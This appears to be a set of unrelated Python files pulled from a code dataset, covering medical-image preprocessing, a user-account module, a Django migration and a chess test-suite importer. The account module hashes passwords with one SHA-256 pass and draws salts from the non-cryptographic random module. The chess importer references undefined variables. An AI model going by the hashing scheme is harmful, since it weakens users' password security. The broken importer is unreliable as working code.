file_list = [[source_path_list[i], target_path_list[i]] for i in range(file_num)]
img_output_path = os.path.join(self.running_read_path, 'img')
label_output_path = os.path.join(self.running_read_path, 'label')
file_list = [[pths[i].replace(self.real_img_path, img_output_path) if i in [0, 1] else pths[i].replace(
self.real_label_path[0],
label_output_path)
for i, pth in enumerate(pths)] for pths in file_list]
if len(self.real_label_path) > 1:
file_list = [[pths[i].replace(self.real_img_path, img_output_path) if i in [0, 1] else pths[i].replace(
self.real_label_path[1],
label_output_path)
for i, pth in enumerate(pths)] for pths in file_list]
output_path = self.task_output_path
pair_txt_path = os.path.join(output_path, 'pair_path_list.txt')
fn_txt_path = os.path.join(output_path, 'pair_name_list.txt')
fname_list = [generate_pair_name([file_list[i][0],file_list[i][1]]) for i in range(file_num)]
write_list_into_txt(pair_txt_path, file_list)
write_list_into_txt(fn_txt_path, fname_list)
def split_file_list(self):
path_list = self.path_list
num_pair = len(path_list)
assert len(path_list[0]) >= 2
has_label = True if len(path_list[0]) == 4 else False
source_path_list = [path_list[i][0] for i in range(num_pair)]
target_path_list = [path_list[i][1] for i in range(num_pair)]
l_source_path_list = None
l_target_path_list = None
if has_label:
l_source_path_list = [path_list[i][2] for i in range(num_pair)]
l_target_path_list = [path_list[i][3] for i in range(num_pair)]
return source_path_list, target_path_list, l_source_path_list, l_target_path_list
def process_img_pool(self):
"""img pool shoudl include following thing:
img_label_path_dic:{img_name:{'img':img_fp,'label':label_fp,...}
img_label_dic: {img_name:{'img':img_np,'label':label_np},......}
pair_name_list:[[pair1_s,pair1_t],[pair2_s,pair2_t],....]
pair_list [[s_np,t_np,sl_np,tl_np],....]
only the pair_list need to be used by get_item method
"""
img_label_path_dic = {}
pair_name_list = []
for fps in self.path_list:
for i in range(2):
fp = fps[i]
fn = get_file_name(fp)
if fn not in img_label_path_dic:
if self.has_label:
img_label_path_dic[fn] = {'img': fps[i], 'label': fps[i + 2]}
else:
img_label_path_dic[fn] = {'img': fps[i]}
pair_name_list.append([get_file_name(fps[0]), get_file_name(fps[1])])
split_dict = self.__split_dict(img_label_path_dic, num_of_workers)
procs = []
for i in range(num_of_workers):
p = Process(target=self.sub_process, args=(split_dict[i],))
p.start()
print("pid:{} start:".format(p.pid))
procs.append(p)
for p in procs:
p.join()
print("completed the processing in {}".format(self.phase))
def sub_process(self, img_label_path_dic):
pbar = pb.ProgressBar(widgets=[pb.Percentage(), pb.Bar(), pb.ETA()], maxval=len(img_label_path_dic)).start()
count = 0
for _, img_label_path in img_label_path_dic.items():
img_pth = img_label_path['img']
label_pth = img_label_path['label']
self.resize_input_img_and_save_it(img_pth, is_label=False, fname=get_file_name(img_pth))
self.resize_input_img_and_save_it(label_pth, is_label=True, fname=get_file_name(label_pth))
count += 1
pbar.update(count)
pbar.finish()
def convert_label_map_into_standard_one(self, label):
label_np = sitk.GetArrayFromImage(label)
cur_label = list(np.unique(label_np))
extra_label = set(cur_label) - self.shared_label_set
# print(" the extra label is {}. ".format(extra_label))
if len(extra_label) == 0:
print("no extra label")
for elm in extra_label:
"""here we assume the value 0 is the background"""
label_np[label_np == elm] = 0
label = sitk.GetImageFromArray(label_np)
return label
def resize_input_img_and_save_it(self, img_pth, is_label=False, fname='', keep_physical=True):
"""
:param img: sitk input, factor is the outputsize/patched_sized
:return:
"""
img_org = sitk.ReadImage(img_pth)
img = self.__read_and_clean_itk_info(img_pth)
if is_label and self.shared_label_set is not None:
img = self.convert_label_map_into_standard_one(img)
dimension = 3
factor = np.flipud(self.resize_factor)
img_sz = img.GetSize()
if self.resize:
resampler = sitk.ResampleImageFilter()
affine = sitk.AffineTransform(dimension)
matrix = np.array(affine.GetMatrix()).reshape((dimension, dimension))
after_size = [int(img_sz[i] * factor[i]) for i in range(dimension)]
after_size = [int(sz) for sz in after_size]
matrix[0, 0] = 1. / factor[0]
matrix[1, 1] = 1. / factor[1]
matrix[2, 2] = 1. / factor[2]
affine.SetMatrix(matrix.ravel())
resampler.SetSize(after_size)
resampler.SetTransform(affine)
if is_label:
resampler.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resampler.SetInterpolator(sitk.sitkBSpline)
img_resampled = resampler.Execute(img)
else:
img_resampled = img
output_path = self.data_output_path
output_path = os.path.join(output_path, 'img') if not is_label else os.path.join(output_path, 'label')
os.makedirs(output_path, exist_ok=True)
fpth = os.path.join(output_path, fname + '.nii.gz')
if keep_physical:
img_resampled.SetSpacing(resize_spacing(img_sz, img_org.GetSpacing(), factor))
img_resampled.SetOrigin(img_org.GetOrigin())
img_resampled.SetDirection(img_org.GetDirection())
sitk.WriteImage(img_resampled, fpth)
return fpth
def __read_and_clean_itk_info(self, path):
if path is not None:
return sitk.GetImageFromArray(sitk.GetArrayFromImage(sitk.ReadImage(path)))
else:
return None
def __split_dict(self, dict_to_split, split_num):
index_list = list(range(len(dict_to_split)))
index_split = np.array_split(np.array(index_list), num_of_workers)
split_dict = []
dict_to_split_items = list(dict_to_split.items())
for i in range(split_num):
dj = dict(dict_to_split_items[index_split[i][0]:index_split[i][-1] + 1])
split_dict.append(dj)
return split_dict
def __inverse_name(self, name):
try:
n_parts = name.split('_image_')
inverse_name = n_parts[1] + '_' + n_parts[0] + '_image'
return inverse_name
except:
n_parts = name.split('_brain_')
inverse_name = n_parts[1] + '_' + n_parts[0] + '_brain'
return inverse_name
def __len__(self):
return len(self.name_list) #############################3
data_path = '/playpen-raid/zyshen/data/reg_debug_labeled_oai_reg_inter'
phase_list = ['test']
""" path for saving the pair_path_list, pair_name_list"""
task_output_path = '/playpen-raid/zyshen/for_llf/reg_debug_labeled_oai_reg_inter'#'/playpen-raid/zyshen/data/croped_for_reg_debug_3000_pair_oai_reg_inter'
""" path for where to read the image during running the tasks"""
running_read_path = '/pine/scr/z/y/zyshen/reg_debug_labeled_oai_reg_inter/data'#'/playpen-raid/zyshen/data/croped_for_reg_debug_3000_pair_oai_reg_inter'
""" path for where to save the data"""
data_output_path = '/playpen-raid/zyshen/oai_data/reg_debug_labeled_oai_reg_inter/data'
""" img path need to be replaced with running_read_img_path"""
real_img_path = '/playpen-raid/zyshen/oai_data/Nifti_rescaled' #'/playpen-raid/zhenlinx/Data/OAI_segmentation/Nifti_6sets_rescaled'
""" label path need to be replaced with runing_read_label_path """
real_label_path = ['/playpen-raid/zyshen/oai_data/Nifti_rescaled']
#['/playpen-raid/zhenlinx/Data/OAI_segmentation/segmentations/images_6sets_right/Cascaded_2_AC_residual-1-s1_end2end_multi-out_UNet_bias_Nifti_rescaled_train1_patch_128_128_32_batch_2_sample_0.01-0.02_cross_entropy_lr_0.0005_scheduler_multiStep_02262018_013038',
# '/playpen-raid/zhenlinx/Data/OAI_segmentation/segmentations/images_6sets_left/Cascaded_2_AC_residual-1-s1_end2end_multi-out_UNet_bias_Nifti_rescaled_train1_patch_128_128_32_batch_2_sample_0.01-0.02_cross_entropy_lr_0.0005_scheduler_multiStep_02262018_013038']
resize_factor = [1,1,1]#[80./160.,192./384.,192./384]
shared_label_set=None
# data_path = '/playpen-raid/zyshen/data/reg_debug_3000_pair_oai_reg_intra'
# phase_list = ['train','val','debug']
# """ path for saving the pair_path_list, pair_name_list"""
# task_output_path = '/playpen-raid/zyshen/data/reg_debug_3000_pair_oai_reg_intra'
# """ path for where to read the image during running the tasks"""
# running_read_path = '/playpen-raid/zyshen/oai_data/reg_debug_labeled_oai_reg_intra/data'
# """ path for where to save the data"""
# data_output_path = '/playpen-raid/zyshen/oai_data/reg_debug_labeled_oai_reg_intra/data'
# """ img path need to be replaced with running_read_img_path"""
# real_img_path = '/playpen-raid/zhenlinx/Data/OAI_segmentation/Nifti_6sets_rescaled'
# """ label path need to be replaced with runing_read_label_path """
# real_label_path = ['/playpen-raid/zhenlinx/Data/OAI_segmentation/segmentations/images_6sets_right/Cascaded_2_AC_residual-1-s1_end2end_multi-out_UNet_bias_Nifti_rescaled_train1_patch_128_128_32_batch_2_sample_0.01-0.02_cross_entropy_lr_0.0005_scheduler_multiStep_02262018_013038',
# '/playpen-raid/zhenlinx/Data/OAI_segmentation/segmentations/images_6sets_left/Cascaded_2_AC_residual-1-s1_end2end_multi-out_UNet_bias_Nifti_rescaled_train1_patch_128_128_32_batch_2_sample_0.01-0.02_cross_entropy_lr_0.0005_scheduler_multiStep_02262018_013038']
# resize_factor = [80./160.,192./384.,192./384]
# shared_label_set=None
# data_path = '/playpen-raid1/zyshen/data/reg_oai_aug'
# phase_list = ['train','val','debug','teset']
# """ path for saving the pair_path_list, pair_name_list"""
# task_output_path = '/playpen-raid1/zyshen/data/reg_oai_aug'
# """ path for where to read the image during running the tasks"""
# running_read_path = '/playpen-raid/zyshen/data/croped_for_reg_debug_3000_pair_oai_reg_intra'
# """ path for where to save the data"""
# data_output_path = '/playpen-raid/zyshen/oai_data/reg_debug_labeled_oai_reg_intra/data'
# """ img path need to be replaced with running_read_img_path"""
# real_img_path = '/playpen-raid/zyshen/oai_data/Nifti_rescaled'#'/playpen-raid/zhenlinx/Data/OAI_segmentation/Nifti_6sets_rescaled'
# """ label path need to be replaced with runing_read_label_path """
# real_label_path = ['/playpen-raid/zyshen/oai_data/Nifti_rescaled']
# #['/playpen-raid/zhenlinx/Data/OAI_segmentation/segmentations/images_6sets_right/Cascaded_2_AC_residual-1-s1_end2end_multi-out_UNet_bias_Nifti_rescaled_train1_patch_128_128_32_batch_2_sample_0.01-0.02_cross_entropy_lr_0.0005_scheduler_multiStep_02262018_013038',
# # '/playpen-raid/zhenlinx/Data/OAI_segmentation/segmentations/images_6sets_left/Cascaded_2_AC_residual-1-s1_end2end_multi-out_UNet_bias_Nifti_rescaled_train1_patch_128_128_32_batch_2_sample_0.01-0.02_cross_entropy_lr_0.0005_scheduler_multiStep_02262018_013038']
# resize_factor = [80./160.,192./384.,192./384]
# shared_label_set=None
#
# data_path = '/playpen-raid/zyshen/data/reg_debug_3000_pair_reg_224_oasis3_reg_inter'
# phase_list = ['train','val','debug','test']
# """ path for saving the pair_path_list, pair_name_list"""
# task_output_path = '/playpen-raid/zyshen/data/croped_lfix_for_reg_debug_3000_pair_reg_224_oasis3_reg_inter'#'/playpen-raid/zyshen/data/croped_for_reg_debug_3000_pair_oai_reg_inter'
# """ path for where to read the image during running the tasks"""
# running_read_path = '/playpen-raid/zyshen/oasis_data/croped_lfix_for_reg_debug_3000_pair_reg_224_oasis3_reg_inter/data'
# #'/pine/scr/z/y/zyshen/croped_for_reg_debug_3000_pair_oai_reg_inter/data'#'/playpen-raid/zyshen/data/croped_for_reg_debug_3000_pair_oai_reg_inter'
# """ path for where to save the data"""
# data_output_path = '/playpen-raid/zyshen/oasis_data/todel/data'
# """ img path need to be replaced with running_read_img_path"""
# real_img_path = '/playpen-raid/xhs400/OASIS_3/processed_images_centered_224_224_224'
# """ label path need to be replaced with runing_read_label_path """
# real_label_path = ['/playpen-raid/xhs400/OASIS_3/processed_images_centered_224_224_224']
# resize_factor = [112./224.,112./224.,112./224]
# """Attention, here we manually add id 62 into list, for it is a big structure and is not absent in val, debug, test dataset"""
# #shared_label_set = {0, 2, 3, 4, 5, 7, 8, 10, 11, 12, 13, 14, 15, 16, 17, 18, 24, 26, 28, 31, 41, 42, 43, 44, 46, 47, 49, 50, 51, 52, 53, 54, 58, 60, 62, 63, 77, 80, 85, 251, 252, 253, 254, 255}
# shared_label_set = {0, 2, 3, 4, 7, 8, 10, 11, 12, 13, 14, 15, 16, 17, 18, 24, 28, 31, 41, 42, 43, 46, 47, 49, 50, 51, 52, 53, 54, 60, 63, 77}
#
# #
#
#
# data_path = '/playpen-raid/zyshen/data/syn_data'
# phase_list = ['test']
# """ path for saving the pair_path_list, pair_name_list"""
# task_output_path = '/playpen-raid/zyshen/for_llf/syn_2d' # '/playpen-raid/zyshen/data/croped_for_reg_debug_3000_pair_oai_reg_inter'
# """ path for where to read the image during running the tasks"""
# running_read_path = '/pine/scr/z/y/zyshen/data/syn_data/syn_2d/data' # '/playpen-raid/zyshen/data/croped_for_reg_debug_3000_pair_oai_reg_inter'
# """ path for where to save the data"""
# data_output_path = '/playpen-raid/zyshen/syn_data/2d_syn/data'
# """ img path need to be replaced with running_read_img_path"""
# real_img_path = '/playpen-raid/zyshen/debugs/syn_expr_0422_2' # '/playpen-raid/zhenlinx/Data/OAI_segmentation/Nifti_6sets_rescaled'
# """ label path need to be replaced with runing_read_label_path """
# real_label_path = ['/playpen-raid/zyshen/debugs/syn_expr_0422_2']
# # ['/playpen-raid/zhenlinx/Data/OAI_segmentation/segmentations/images_6sets_right/Cascaded_2_AC_residual-1-s1_end2end_multi-out_UNet_bias_Nifti_rescaled_train1_patch_128_128_32_batch_2_sample_0.01-0.02_cross_entropy_lr_0.0005_scheduler_multiStep_02262018_013038',
# # '/playpen-raid/zhenlinx/Data/OAI_segmentation/segmentations/images_6sets_left/Cascaded_2_AC_residual-1-s1_end2end_multi-out_UNet_bias_Nifti_rescaled_train1_patch_128_128_32_batch_2_sample_0.01-0.02_cross_entropy_lr_0.0005_scheduler_multiStep_02262018_013038']
# resize_factor = [1, 1, 1] # [80./160.,192./384.,192./384]
# shared_label_set = None
#
for phase in phase_list:
dataset = RegistrationDataset(data_path=os.path.join(data_path, phase), phase=phase, resize_factor=resize_factor)
dataset.set_task_output_path(os.path.join(task_output_path, phase))
dataset.set_data_output_path(os.path.join(data_output_path, phase))
dataset.set_real_data_path(real_img_path, real_label_path)
dataset.set_running_read_path(os.path.join(running_read_path, phase))
if shared_label_set is not None:
dataset.set_shared_label(shared_label_set)
dataset.process()
|
python
|
#-*- coding: utf-8 -*-
"""
security
~~~~~~~~
Generic User class for interfacing with use accounts +
authentication.
"""
import hashlib
import random
from utils import Storage, to36, valid_email, \
ALPHANUMERICS as ALPHAS
username_regex = r'([A-Za-z0-9_%s]){%s,%s}$'
passwd_regex = r'([A-Za-z0-9%s]){%s,%s}$'
class Account(object):
"""The base Account class provides the basic functions for allowing
user account creation and authentication, however it should be
extended to allow user retrieval.
"""
@classmethod
def authenticate(cls, username, passwd, salt, uhash):
"""Authenticates/validates a user's credentials by comparing
their username and password versus their computed salted hash.
A successful authentication results in True, False otherwise.
"""
return cls._roast(username + salt + passwd) == uhash
@classmethod
def register(cls, username, passwd, passwd2=None, salt='', email='', **kwargs):
"""Creates a complete user tuple according to seed
credentials. The input undergoes a salting and roasting during
a hashing process and all values are returned for further db
handling (db insertion, etc). Note: For security reasons,
plaintext passwords are never returned and should not be
stored in a db unless there's a very specific reason to.
XXX: Consider adding the following keyword arguments:
password_validator - lambda for validating passwd (chars, len)
username_validator - lambda for validating username (len, etc)
:param salt: used for testing/verifying hash integrity in tests
:param kwargs: any addt'l info which should be saved w/ the created user
usage:
>>> from waltz import Account
# typically, salt is not provided as an argument and is instead
# generated as a side effect of Account.register("username", "password").
# A salt has been included along with the following function call to
# guarantee idempotence (i.e. a consistent/same uhash with each call)
>>> Account.register("username", "password", salt="123456789")
<Storage {'username': 'username', 'uhash': '021d98a32375ed850f459fe484c3ab2e352fc2801ef13eae274103befc9d0274', 'salt': '123456789', 'email': ''}>
# using additional kwargs, such as age (i.e. age=24) to add user attributes
>>> Account.register("username", "password", salt="123456789", age=24)
<Storage {'username': 'username', 'uhash': '021d98a32375ed850f459fe484c3ab2e352fc2801ef13eae274103befc9d0274', 'salt': '123456789', 'email': '', 'age': 24}>
"""
if not passwd: raise ValueError('Password Required')
if email and not valid_email(email):
raise ValueError("Email '%s' is malformed and does not " \
"pass rfc3696." % email)
if passwd2 and not passwd == passwd2:
raise ValueError('Passwords do not match')
salt = salt or cls._salt()
uhash = cls._roast(username + salt + passwd)
return Storage(zip(('username', 'salt', 'uhash', 'email'),
(username, salt, uhash, email)) + kwargs.items())
@classmethod
def public_key(cls, uid, username, salt):
"""Generates a public key which can be used as a public unique
identifier token in account activation emails and other
account specific situations where you wish to create a url
intended to only work for a specific user.
"""
return cls._roast(uid + username + salt)
@classmethod
def _salt(cls, length=12):
"""http://en.wikipedia.org/wiki/Salt_(cryptography)
Salting results in the generation of random padding of a
specified 'length' (12 default) which can be prepended or
appended to a password prior to hashing to increase security
and prevent against various brute force attacks, such as
rainbow-table lookups."""
return ''.join([random.choice(ALPHAS) for i in range(length)])
@classmethod
def _roast(cls, beans, chash=hashlib.sha256):
"""Computes a hash digest from username, salt, and
password. Hot swappable algo in case there are code changes
down the road."""
return chash(beans).hexdigest()
|
python
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-10-26 11:01
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('auth', '0008_alter_user_username_max_length'),
('moving', '0006_auto_20181026_0830'),
]
operations = [
migrations.CreateModel(
name='Booking',
fields=[
('location', models.TextField(max_length=50, null=True)),
('number', models.TextField(max_length=50, null=True)),
('email', models.TextField(max_length=50, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),
('payment', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='booking', to='moving.Payment')),
],
),
]
|
python
|
import re
S = input()
if re.search(r'^(hi)+$', S):
print('Yes')
else:
print('No')
|
python
|
# -*- Mode: Python3; coding: utf-8; indent-tabs-mpythoode: nil; tab-width: 4 -*-
import os
import numpy as np
PATH = "../Images/"
def organize(data):
# ndArray
print("Original:")
print(data[:2])
# Preparar, remodelar Array
height, width, channels = data.shape
data = data.flatten() # vetorizar
temp = [i for i in data] # lista
temp = [temp[i:i+channels] for i in range(0, height * width * channels,
channels)] # separar pixels novamente
# Ordenação crescente
for c in range(0, channels):
# Ordenar do último canal para o primeiro
i = channels - c - 1
temp.sort(key=lambda value: value[i])
npArray = np.array(temp, dtype=np.uint8)
npArray = npArray.flatten() # abrir
npArray = npArray.reshape(height, width, channels) # remodelar
print("Result:")
print(npArray[:2])
def test(filename):
img_np = PATH + filename + ".npy"
print("Data: ", img_np)
if not os.path.exists(img_np):
print("File not found!")
return
data = np.load(img_np)
organize(data)
if __name__ == '__main__':
# ndArray
h, w, c = 5, 4, 3
numbers = [i for i in range(h*w*c, 0, -1)]
npArray = np.array(numbers).reshape(h, w, c)
organize(npArray)
# ndArray (Imagem)
test("folha_croton")
|
python
|
from arrp import clear
def test_clear():
clear("test_dataset")
|
python
|
from multiprocessing import Pool
from .rabbitmq.rmq_consumer import CocoRMQConsumer
from .kafka.kafka_consumer import CocoKafkaConsumer
from .redis.redis_consumer import CocoRedisConsumer
from .logger import logger
import time
# this is aka mixture of a consumer factory and threadpool
class CocoConsumerManager(object):
CONSUMER_CLASS = {
"RMQ": CocoRMQConsumer,
"KAFKA": CocoKafkaConsumer,
"REDIS": CocoRedisConsumer
}
def __init__(self, config, worker_class, pool_size, customized_logger = None):
self._worker_class = worker_class
self._pool = None
self._pool_size = pool_size
self._config = config
if customized_logger:
self._logger = customized_logger
def start(self):
# self._pool = Pool()
# _ = [self._pool.apply_async(CocoConsumerManager._start_consumer,
# args=[x, self._worker_class, self._config]) for x in range(self._pool_size)]
CocoConsumerManager._start_consumer(1, self._worker_class, self._config)
# self._pool.close()
# self._pool.join()
# logger.warning("All progress stopped!")
@staticmethod
def _start_consumer(seq, worker_class, config):
logger.debug('start consumer')
# worker = worker_class(config, seq)
consumer_type = config["MQ_TYPE"]
logger.debug('consumer type: {}'.format(consumer_type))
consumer_class = CocoConsumerManager.CONSUMER_CLASS[consumer_type]
sub_config = config[consumer_type]
# while True:
# try:
# consumer = consumer_class(sub_config, worker_class, logger)
# consumer.connect()
# except Exception as err:
# logger.error(err)
# logger.warning("Consumer Error. Reconnect after 10 seconds.")
# time.sleep(10)
# let the consumer handling reconect
consumer = consumer_class(sub_config, worker_class, logger)
consumer.connect()
|
python
|
# Suites of test positions are normally stored in many different EPD files.
# We keep them in one big JSON file instead, with standardized IDs, because
# that makes it easier to keep track of scores over time.
#
# This program imports a new EPD test suite into that JSON file.
import sys
import json
import chess
import chess.engine
epdfile = sys.argv[1]
all_epd = []
line_idx = 0
with open( epdfile + ".epd" ) as epd:
for line in epd.readlines():
line_idx = line_idx + 1
line = line.strip()
# Some epd files are passive-aggressive and use 'am' instead of 'bm'
line = line.replace( "am ", "bm " )
# Some epd files have no separator between the fen and the best move
line = line.replace( "bm ", ";bm " )
# A small number of epd files don't actually *provide*
# a best move, which seems like it kind of defeats the point,
# but ok. In these cases we fire up a strong reference engine
# to get a quick opinion about what looks good. Deeper searches
# might give us better data here.
if not 'bm ' in line:
board = chess.Board( line )
if not refengine:
refengine = chess.engine.SimpleEngine.popen_uci( "..\Engine\stockfish-10" )
result = refengine.play( board, chess.engine.Limit( depth=10 ) )
line = line + ";bm " + str( result.move )
# After the fen it's all key/value pairs between semicolons
fields = line.split( ';' )
if len( fields ) > 0:
this_test = {}
fen = fields[0].strip()
this_test['fen'] = fen
for meta in fields[1:]:
meta = meta.strip()
if len( meta ) > 0:
if ' ' in meta:
sep = meta.index( ' ' )
key = meta[:sep].strip()
val = meta[sep:].strip()
if val.startswith( '"' ) and val.endswith( '"' ):
val = val[1:-1]
this_test[key] = val
# Overwrite any existing ID
if not 'id' in this_test:
this_test['id'] = epdfile.replace( '.', '-' ) + "-" + str( line_idx )
try:
bmove = chess.Move.from_uci( bm )
except:
# Eww
bmove = board.parse_san( bm )
all_epd.append( this_test )
if refengine:
refengine.quit()
ser = json.dumps( all_epd, sort_keys = True, indent = 4 )
print( ser )
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.